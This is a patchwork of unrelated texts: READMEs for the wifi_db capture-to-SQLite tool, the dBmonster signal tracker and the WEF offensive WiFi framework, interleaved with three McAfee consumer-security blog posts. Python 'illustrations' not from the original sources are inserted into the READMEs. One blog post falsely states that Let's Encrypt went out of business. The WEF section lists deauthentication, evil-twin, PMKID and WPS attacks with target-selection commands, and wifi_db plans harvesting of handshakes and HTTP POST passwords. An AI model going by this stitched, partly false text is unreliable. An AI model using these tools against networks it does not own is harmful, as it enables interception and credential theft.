sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db

  • -v $PWD/db.SQLITE:/db.SQLITE: To save the output in the db.SQLITE file in the current folder
  • -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the Docker container

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, pass the name of the capture without its extension.

python3 wifi_db.py scan-01

In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be opened with:

Below is an example of a ProbeClientsConnected table.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
  capture               capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
  -h, --help            show this help message and exit
  -v, --verbose         increase output verbosity
  --debug               increase output verbosity to debug
  -o, --obfuscated      Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
  -t LAT, --lat LAT     insert a fake lat in the new elements
  -n LON, --lon LON     insert a fake lon in the new elements
  --source [{aircrack-ng,kismet,wigle}]
                        source from capture data (default: aircrack-ng)
  -d DATABASE, --database DATABASE
                        output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.
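As an added illustration (not wifi_db's own code), the following Python builds a subset of the tables above and the ConnectedAP, ProbeClientsConnected and SummaryAP views in an in-memory SQLite database, loads constructed sample rows, and queries them: ProbeClientsConnected surfaces associated clients that still probe for other networks, and SummaryAP surfaces an SSID advertised by more than one BSSID, the two checks an analyst would run against a capture of their own site. Column names follow the README; the view SQL is my reconstruction of the descriptions, not wifi_db's definitions.

```python
import sqlite3

# Subset of the wifi_db schema, using the column names given in the README.
# The view definitions are reconstructed from the README descriptions.
SCHEMA = """
CREATE TABLE AP (
    bssid TEXT PRIMARY KEY, ssid TEXT, cloaked INTEGER, manuf TEXT,
    channel INTEGER, frequency INTEGER, carrier TEXT, encryption TEXT,
    packetsTotal INTEGER);
CREATE TABLE Client (
    mac TEXT PRIMARY KEY, ssid TEXT, manuf TEXT, type TEXT, packetsTotal INTEGER);
CREATE TABLE Connected (
    bssid TEXT REFERENCES AP(bssid), mac TEXT REFERENCES Client(mac),
    PRIMARY KEY (bssid, mac));
CREATE TABLE Probe (
    mac TEXT REFERENCES Client(mac), ssid TEXT, time TEXT,
    PRIMARY KEY (mac, ssid));

-- ConnectedAP: which client is associated to which AP, ordered by BSSID.
CREATE VIEW ConnectedAP AS
    SELECT c.bssid, a.ssid, c.mac, cl.manuf
    FROM Connected c
    JOIN AP a ON a.bssid = c.bssid
    JOIN Client cl ON cl.mac = c.mac
    ORDER BY c.bssid;

-- ProbeClientsConnected: probes sent by associated clients, excluding
-- probes for the SSID the client is already connected to.
CREATE VIEW ProbeClientsConnected AS
    SELECT ca.bssid, ca.ssid AS connected_ssid, p.mac, cl.manuf, cl.type,
           cl.packetsTotal, p.ssid AS probe_ssid
    FROM Probe p
    JOIN Client cl ON cl.mac = p.mac
    JOIN ConnectedAP ca ON ca.mac = p.mac
    WHERE p.ssid <> ca.ssid
    ORDER BY p.ssid;

-- SummaryAP: how many BSSIDs advertise each SSID, most common first.
CREATE VIEW SummaryAP AS
    SELECT ssid, COUNT(bssid) AS n, encryption, manuf, cloaked
    FROM AP GROUP BY ssid ORDER BY n DESC;
"""

# Constructed sample rows (not from a real capture). The third AP advertises
# the corporate SSID from an unknown vendor with no encryption.
SAMPLE_APS = [
    ("AA:BB:CC:00:00:01", "CorpNet", 0, "Cisco", 6, 2437, "802.11n", "WPA2", 1200),
    ("AA:BB:CC:00:00:02", "GuestNet", 0, "Cisco", 11, 2462, "802.11n", "WPA2", 300),
    ("DE:AD:BE:EF:00:03", "CorpNet", 0, "Unknown", 1, 2412, "802.11n", "OPN", 40),
]
SAMPLE_CLIENTS = [
    ("11:22:33:44:55:66", "CorpNet", "Apple", "laptop", 500),
    ("66:55:44:33:22:11", "GuestNet", "Samsung", "phone", 80),
    ("77:88:99:AA:BB:CC", "", "Intel", "laptop", 12),
]
SAMPLE_CONNECTED = [
    ("AA:BB:CC:00:00:01", "11:22:33:44:55:66"),
    ("AA:BB:CC:00:00:02", "66:55:44:33:22:11"),
]
SAMPLE_PROBES = [
    ("11:22:33:44:55:66", "CorpNet", "2024-01-01 10:00:00"),
    ("11:22:33:44:55:66", "HomeWifi", "2024-01-01 10:00:05"),
    ("66:55:44:33:22:11", "GuestNet", "2024-01-01 10:01:00"),
    ("77:88:99:AA:BB:CC", "CoffeeShop", "2024-01-01 10:02:00"),
]


def build_db() -> sqlite3.Connection:
    """Create the schema in memory and load the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO AP VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_APS)
    con.executemany("INSERT INTO Client VALUES (?,?,?,?,?)", SAMPLE_CLIENTS)
    con.executemany("INSERT INTO Connected VALUES (?,?)", SAMPLE_CONNECTED)
    con.executemany("INSERT INTO Probe VALUES (?,?,?)", SAMPLE_PROBES)
    con.commit()
    return con


def probes_for_other_ssids(con):
    """Associated clients still probing for networks other than the one they
    are on, as (mac, connected_ssid, probe_ssid) rows."""
    return con.execute(
        "SELECT mac, connected_ssid, probe_ssid FROM ProbeClientsConnected"
    ).fetchall()


def ssid_bssid_counts(con):
    """(ssid, number of BSSIDs advertising it), most common first; a count
    above the number of APs you own is worth a look."""
    return con.execute("SELECT ssid, n FROM SummaryAP").fetchall()


if __name__ == "__main__":
    db = build_db()
    print("probes for other SSIDs:", probes_for_other_ssids(db))
    print("BSSIDs per SSID:", ssid_bssid_counts(db))
```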

TODO

  • Aircrack-ng
  • All in 1 file (and separately)
  • Kismet
  • Wigle
  • install
  • parse all files in folder -f --folder
  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)
  • Support bash multi files: "capture*-1*"
  • Script to delete client or AP from DB (mac). - (Whitelist)
  • Whitelist to avoid adding a MAC to the DB (file whitelist.txt, add MACs, create DB)
  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')
  • Table Handshakes and PMKID
  • Hashcat hash format 22000
  • Table files, if file exists skip (full path)
  • Get HTTP POST passwords
  • DNS queries


This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

  • Raúl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0



Why You Need to Watch Out When Using Public Wi-Fi

By: McAfee

If you’re like most people, you like to stay connected whether you are traveling or just on the go. That’s why it can be tempting to connect to free, public Wi-Fi networks, but you should know that these networks could open you up to some serious risks.

Public Wi-Fi networks often lack a security measure called encryption, which scrambles the information sent from your computer or device to the router so strangers cannot read it. Without this security measure in place, the information you send over these networks can potentially be intercepted by cybercrooks.

This information could include your banking and social media passwords, as well as your identity information. A nosy cybercriminal could also potentially snoop on you by watching which websites you visit, and what you type into web forms.

In fact, it is so easy to steal your information over unsecured networks that cybercrooks sometimes set up malicious Wi-Fi hotspots in high-traffic areas, like airports, with the intention of grabbing users’ information.

That’s why if you have to connect when you’re away, you should only use secure and well-advertised Wi-Fi networks. You can usually tell if they use encryption because they require a password to join.

If you have to do something sensitive online, like check your bank account balance or make a purchase, try to stick to webpages that start with “HTTPS” rather than just “HTTP”. The “S” stands for secure and indicates that the site uses encryption to protect your data. You can also look for a green lock icon at the beginning of the browser address, which indicates that the website connection is secure.

If you are on your mobile phone, you can skip the Wi-Fi network altogether and connect using the cellular network. It is somewhat more secure since it’s harder for cybercrooks to sniff out your individual data from others on the network.

If you travel a lot, consider investing in a Virtual Private Network (VPN), which is a piece of software that allows you to create a secure connection to another network over the Internet. Anyone potentially trying to snoop on you will only see that you are connected to the VPN, and not what you are doing.

Of course, the most important thing is to remember that using public Wi-Fi is always risky, and requires some extra steps to protect your data.

Here are some more tips to help keep you safe:

  • Think twice before connecting to any public Wi-Fi network, especially if it does not require a password to join.
  • Avoid using free, public computers. Cybercriminals sometimes place compromised computers in legitimate Wi-Fi hotspots with the intention of spreading malware or stealing your data.
  • Try to save sensitive transactions, like banking and online shopping, for your secure home or work networks.
  • If you do use a public network, stick to sites that begin with “HTTPS” so you know they are secure. The HTTPS Everywhere browser extension can direct you to encrypted pages when available. Also, look for the green lock icon in the browser’s address bar.
  • When using your laptop, make sure to turn off “sharing” of your folders and devices so no one else on the network can access them. A quick web search can tell you how to do this on your operating system.
  • Use comprehensive security software and keep it up-to-date. If your software includes a firewall, make sure to enable it.

The post Why You Need to Watch Out When Using Public Wi-Fi appeared first on McAfee Blog.

The Best Way To Protect Your Online Identity

For many Aussies, identity theft was always something that happened to other people. People on TV, usually. But the recent spate of data breaches at Optus, Medibank and Energy Australia has made many of us pay far more attention than ever to one of the fastest growing crimes in our country.  

According to the Department of Home Affairs, 1 in 4 Aussies will be the victim of identity theft over the course of their lives with an annual economic impact of more than $2 billion. And with the financial fallout from the recent data breaches only just starting to be counted, these statistics will no doubt increase dramatically next year. 

What Actually Is Identity Theft? 

Identity theft is when a cybercriminal gains access to your personal information to steal money or gain other benefits. Armed with your personal info, they can apply for real identity documents in your name but with another person’s photograph. This enables them to then apply for loans or benefits in your name, sign up for memberships or even apply for credit cards. 

And it goes without saying that the financial and emotional fallout from identity theft can be huge. Since the Optus and Medibank hacking stories broke just a few months ago, there have been multiple stories of Aussie families who have had their identities stolen and who are in a world of pain. This Melbourne family who have had over $40,000 stolen from ATM withdrawals alone is just one example.

What Do You Mean By Personal Information? 

Your personal information is any piece of information or data that can confirm who you are or how to find you. It may be a single piece of information, or several pieces used together. It’s often referred to as personally identifiable information (PII). So, it includes your name, parents’ names, address, date of birth, phone numbers, email address, usernames/passwords or passphrases, bank account details, school or university attended, location check-ins, even RSVPs for events.

Every time you register with a new shopping site or social media platform, you will be asked to share some personally identifiable information. However, what you share may be stolen or even misused – just think about the recent list of Australian companies who had their customers’ private information stolen by hackers. So that’s why you need to ensure you are only sharing your information with trusted online sites and take every possible step to protect your personal information online. 

How To Protect Your Online Identity 

While there are no guarantees in life, there are steps you can take to ensure your online identity is as safe as possible. Here are my top 5 tips: 

1. Use Multi-Factor Authentication When It’s Offered – Always! 

Multi-Factor Authentication (MFA) or 2 Factor Authentication (2FA) is a no-brainer because it makes a hacker’s life a lot harder. In short, it requires the user to provide two or more verification factors to gain access to an account or app. This might be a text, email or even a code generated by an authentication app. So, even if a hacker has your password and username, they still need that final piece of information before they can get their hands on your account! 

2. Use A Different (and Complex) Password On Every Account 

Now this may take a bit of work to set up but using a unique and complex password on every account is one of the best things you can do to protect your online identity. And here’s the rationale – if you use the same password on all your accounts and your login details are stolen then hackers have access to all the accounts that are accessed with that password. Yikes!!! So, a unique password for each account is a great measure. I love using a password manager to make this process a little easier. Not only do they generate complex passwords, but they remember them too! All you need to do is remember your Master Password which needs to be extremely complex!!! 

3. Keep Your Devices and Software Updated & Backed-Up 

Updates are most commonly about addressing security weaknesses. And yes, I know they can be a pain but if you ignore them, you are essentially making it easier for hackers to find their way into your life via weak spots. And don’t forget to ensure your security software remains updated too!   

I always recommend keeping a backup of all your important info in case something goes wrong. This should include all your photos, key documents and all your personally identifiable information. A hard drive works well but saving to the cloud is also a good option. I once dropped a hard drive and lost treasured family photos, so the cloud is my personal preference. 

4. Stay Ahead of The Threats – Invest in a Security & Identity Protection Solution  

We all know knowledge is power so investing in top notch security and identity monitoring software will help keep you ahead of threats. McAfee+, McAfee’s new all in one privacy, identity and device protection solution is a fantastic way for Aussies to protect themselves online. It features identity monitoring and a password manager but also an unlimited VPN, a file shredder, protection score and parental controls. And the Rolls Royce version called McAfee+ Advanced, also offers subscribers additional identity protections including access to licensed restoration experts who can help you repair your identity and credit, in case you’re affected by a data breach. It also gives subscribers access to lost wallet protection which help you cancel and replace your ID, credit cards if they are lost or stolen. 

5. Only Use Secure Wi-Fi or a VPN 

Public, unsecured Wi-Fi can make life so much easier when you’re out and about but it’s also a tried and tested way for scammers to access your personal information. Unsecured Wi-Fi is free Wi-Fi that is available in public places such as libraries, cafes, or shopping centres. So, instead of using Wi-Fi, just use the data in your phone plan. Or alternatively invest in a Virtual Private Network (VPN) that cleverly encrypts everything you share on your device.   

About 2 months ago, I embarked on a project to clean up my online life. I’m working through the list of sites I have accounts with and am closing those I no longer use, I’m also doing a huge password audit to ensure they are all unique to each site and are super complex, thanks to my password manager. Now, I’m not quite done yet, but things are in better shape than they were. Why not consider doing the same? With the holiday season fast approaching, why not dedicate a little of your poolside time to practicing a little cyber hygiene. 


Till next time, keep those identities safe! 


Alex    

The post The Best Way To Protect Your Online Identity appeared first on McAfee Blog.

“This Connection Is Not Private” – What it Means and How to Protect Your Privacy

By: McAfee

Have you ever been browsing online and clicked a link or search result that took you to a site that triggers a “your connection is not private” or “your connection is not secure” error code? If you’re not too interested in that particular result, you may simply move on to another result option. But if you’re tempted to visit the site anyway, you should be sure you understand what the warning means, what the risks are, and how to bypass the error if you need to.

What does “this connection is not private” mean?

A “your connection is not private” error means that your browser cannot determine with certainty that a website has safe encryption protocols in place to protect your device and data. You can bump into this error on any device connected to the internet — computer, smartphone, or tablet.  

So, what exactly is going on when you see the “this connection is not private” error?  

For starters, it’s important to know that seeing the error is just a warning, and it does not mean any of your private information is compromised. A “your connection is not private” error means the website you were trying to visit does not have an up-to-date SSL (secure sockets layer) security certificate.

Website owners must maintain the licensing regularly to ensure the site encryption capabilities are up to date. If the website’s SSL certificate is outdated, it means the site owners have not kept their encryption licensing current, but it doesn’t necessarily mean they are up to no good. Even major websites like LinkedIn have had momentary lapses that would throw the error. LinkedIn mistakenly let their subdomain SSL certificates lapse.  

In late 2021, a significant provider of SSL certificates, Let’s Encrypt, went out of business. When their root domain officially lapsed, it created issues for many domain names and SSL certificates owned by legitimate companies. The privacy error created problems for unwitting businesses, as many of their website visitors were rightfully concerned about site security.  

While it does not always mean a website is unsafe to browse, it should not be ignored. A secure internet connection is critical to protecting yourself online. Many nefarious websites are dangerous to visit, and this SSL certificate error will protect you from walking into them unaware.   

SSL certification standards have helped make the web a safer place to transact. It helps ensure online activities like paying bills online, ordering products, connecting to online banking, or keeping your private email accounts safe and secure. Online security continues to improve with a new Transport Layer Security (TLS) standard, which promises to be the successor protocol to SSL. 

So be careful whenever visiting sites that trigger the “connection is not private” error, as those sites can potentially make your personal data less secure and make your devices vulnerable to viruses and malware.

Note: The “your connection is not private” error is Google Chrome‘s phrasing. Microsoft Edge or Mozilla Firefox users will instead see a “your connection is not secure” error as the warning message.   

How to fix the “connection is not private” error

If you feel confident that a website or page is safe, despite the warning from your web browser, there are a few things you can do to troubleshoot the error.  

  • Refresh the page. In some cases, the error is just a momentary glitch. Try reloading the page to rule out a temporary error.  
  • Close browser and reopen. Closing and reopening your web browser might also help clear a temporary glitch.  
  • If you’re on public WiFi, think twice. Hackers often exploit public WiFi because their routers are usually not as secure or well-maintained for security. Some public WiFi networks may not have an SSL connection, or they may limit your access to websites. You can safely browse more securely in public spaces if you have an antivirus software or virtual private network (VPN) solution. 
  • Use “Incognito” mode. The most used browsers (Google Chrome browser, Mac‘s Safari, Mozilla Firefox, and Microsoft Edge) offer an “Incognito mode” that lets you browse without data collecting in your history or cache. Open the site in a new incognito window and see if the error still appears.  
  • Clear the cache on your browser. While cookies make browsing the web more convenient and personalized, they also can hold on to sensitive information. Hackers will take advantage of cached data to try and get passwords, purchase information, and anything else they can exploit. Clear browsing data before going to a site with the “connection is not secure” error to help limit available data for hackers.
  • Check the computer’s date and time. If you frequently see the “connection is not private” error, you should check and ensure your computer has the accurate time and date. Your computer’s clock can sometimes have time and date stamp issues and get glitchy in multiple ways. If it’s incorrect, adjust the date and set the time to the correct settings.  
  • Check your antivirus software. If your antivirus software is sensitive, you may have to disable it momentarily to bypass the error. Antivirus software protects you, so you should be careful to remember to turn the software back on again after you’ve bypassed the error.  
  • Be sure your browsers and operating systems are up to date. You should always keep your critical software and the operating system fully updated. An outdated browser can start getting buggy and can increase the occurrence of this kind of error.  
  • Research the website. Do a quick search for the company of the website you wish to visit and make sure they are a legitimate business. You can search for reviews, Better Business Bureau ratings, or check for forums to see if others are having the same issue. Be sure you are spelling the website address correctly and that you have the correct URL for the site. Hackers can take advantage of misspellings or alternative URLs to try and snare users looking for trusted brands. 
  • If it’s not you, it’s them. If you’ve tried all the troubleshooting techniques above and you still see the error, the problem is likely coming from the site itself. If you’re willing to take your chances (after clearing your browser’s cache), you can click the option to “proceed to the domain,” though it is not recommended. You may have to choose “advanced settings” and click again to visit the site.   

Remember, you are taking your chances anytime you ignore an error. As we mentioned, you could leave yourself vulnerable to hackers after your passwords, personal information, and other risks.  

How to protect your privacy when browsing online

Your data and private information are valuable to hackers, so they will continue to find new ways to try and procure it. Here are some ways to protect yourself and your data when browsing online.  

  • Antivirus solutions are, hands down, your best line of protection against hacking. Solutions like McAfee+ Ultimate offer all the tools you need to secure your data and devices.  
  • Use strong passwords and two-factor authentication when available. 
  • Delete unused browser extensions (or phone apps) to reduce access. 
  • Always keep your operating system and browsers up-to-date. You can open system preferences and choose to update your system automatically. 
  • Use a secure VPN solution to shield your data when browsing. 
  • Use your favorite browser’s incognito mode to reduce the data connected to your devices. 
  • Remove any 3rd party apps from your social media accounts — especially if you’ve recently taken a Facebook quiz or similar (also, don’t take Facebook quizzes). 
  • Engage the highest privacy settings in each of your browsers. 
  • Always check the address bar for HTTPS before sharing credit cards or other sensitive data on a website. 
  • Share less personal and private information on social media.  

Discover how McAfee keeps you and your data safe from threats

As we continue to do more critical business online, we must also do our best to address the risks of the internet’s many conveniences.  

A comprehensive cybersecurity tool like McAfee+ Ultimate can help protect you from online scams, identity theft, and phishing attempts, and ensure you always have a secure connection. McAfee helps keep your sensitive information out of the hands of hackers and can help you keep your digital data footprints lighter with personal data cleanup.  

With McAfee’s experts on your side, you can enjoy everything the web offers with the confidence of total protection. 

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

dBmonster - Track WiFi Devices With Their Received Signal Strength


With dBmonster you are able to scan for nearby WiFi devices and track them through the signal strength (dBm) of the packets they send (sniffed with TShark). These dBm values are plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self-made antenna works best (antenna radiation patterns).
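An added example (not dBmonster's code) of the step the description above relies on: parsing tshark's per-frame dBm values into a per-transmitter series, smoothing it, and computing a trend, which is what a defender walking toward an unauthorised transmitter with a directional antenna watches. The sample output is constructed; the tshark fields assumed (frame.time_epoch, wlan.sa, radiotap.dbm_antsignal) are standard field names and the field output is tab separated.

```python
from collections import defaultdict
from statistics import mean

# Constructed sample of `tshark -I -i <iface> -T fields -e frame.time_epoch
# -e wlan.sa -e radiotap.dbm_antsignal` output (tab separated). Not a real
# capture. One frame carries two antenna readings, one carries none.
SAMPLE_TSHARK = """\
1700000000.10\taa:bb:cc:dd:ee:01\t-71
1700000000.35\taa:bb:cc:dd:ee:02\t-55
1700000001.12\taa:bb:cc:dd:ee:01\t-68,-70
1700000001.90\taa:bb:cc:dd:ee:01\t
1700000002.40\taa:bb:cc:dd:ee:01\t-64
1700000003.05\taa:bb:cc:dd:ee:02\t-56
1700000003.70\taa:bb:cc:dd:ee:01\t-60
1700000004.20\taa:bb:cc:dd:ee:01\t-57
"""


def parse_rssi(text):
    """Map each source MAC to a list of (epoch seconds, dBm) samples.

    Frames without a radiotap signal field are skipped. When radiotap reports
    one value per antenna ("-68,-70"), the strongest reading is kept, which
    is the one a directional antenna sweep cares about.
    """
    series = defaultdict(list)
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 3:
            continue
        ts, mac, sig = parts
        if not mac or not sig.strip():
            continue
        dbm = max(int(v) for v in sig.split(",") if v.strip())
        series[mac.lower()].append((float(ts), dbm))
    return dict(series)


def smooth(samples, window=3):
    """Trailing moving average of the dBm values, one output per sample."""
    vals = [dbm for _, dbm in samples]
    return [mean(vals[max(0, i - window + 1): i + 1]) for i in range(len(vals))]


def trend(samples, window=3):
    """Change in smoothed dBm from the first full window to the last sample.

    Positive means the signal is getting stronger (antenna is closing in on
    the transmitter); 0.0 when there is not yet enough data to say.
    """
    if len(samples) < window + 1:
        return 0.0
    s = smooth(samples, window)
    return s[-1] - s[window - 1]


if __name__ == "__main__":
    for mac, samples in parse_rssi(SAMPLE_TSHARK).items():
        print(mac, [round(v, 1) for v in smooth(samples)], round(trend(samples), 1))
```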


Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
Track & scan on 2.4GHz
Track & scan on 5GHz
Scanning for AP
Scanning for STA
Beep when device found

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

Platform          WiFi Adapter
Kali Linux        ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey    Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Check whether there are any processes named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter if you have any more problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


WEF - Wi-Fi Exploitation Framework


A fully offensive framework for 802.11 networks and protocols with different types of attacks for WPA and WEP, automated hash cracking, bluetooth hacking and much more.

  • I recommend you my alfa adapter: Alfa AWUS036ACM, which works really great with both 2.4 and 5 GHz

Tested and supported in Kali Linux, Parrot OS, Arch Linux and Ubuntu

*However it's not finished and may have issues, try it at your own risk.*

If you have any issue, please contact me or create an issue


SUPPORTED ATTACKS:

  • Deauthentication Attack
  • Authentication Attack
  • Beacon Flood Attack
  • PMKID Attack
  • EvilTwin Attack
  • Passive/Stealthy Attack
  • Pixie Dust Attack
  • Null Pin Attack
  • Chopchop Attack
  • Replay Attack
  • Michael Exploitation Attack
  • Caffe-Latte Attack
  • Jamming, Reading and Writing bluetooth connections
  • GPS Spoofing with HackRF

FEATURES:

  • Log generator
  • WPA/WPA2, WPS and WEP Attacks
  • Auto handshake cracking
  • Multiple templates for EvilTwin attack
  • Check monitor mode and its status
  • 2GHz and 5GHz attacks
  • Custom wordlist selector
  • Auto detect requirements
  • Bluetooth support (Jamming, Reading, Writing)

USAGE:

Common usage of the framework

wef -i wlan0 # Your interface name might be different

or

wef --interface wlan0

Once the application is working, type 'help' to view more functions and useful info.

If you don't want to scan APs with every attack you can do something like this:

set name my-wifi # To specify the name to attack
set time 60 # To define the total duration of the attacks that ask for the time
set packets 15 # To define the amount of packets that some attacks will send

REQUIREMENTS:

Don't install them manually, WEF takes care of that if you don't already have them

aircrack-ng
reaver
mdk4
macchanger
hashcat
xterm
hcxtools
pixiewps
python3
btlejack
crackle
php
hostapd
dnsmasq

INSTALLATION:

Checkout the Wiki

DEMO:

Demo on a Parrot OS with Kitty terminal

Created by D3Ext

Extra

If you are using bspwm, you can add this line to your bspwmrc so that the xterm windows are always launched in floating mode (for a prettier design)

bspc rule -a XTerm state=floating


Copyright © 2022, D3Ext


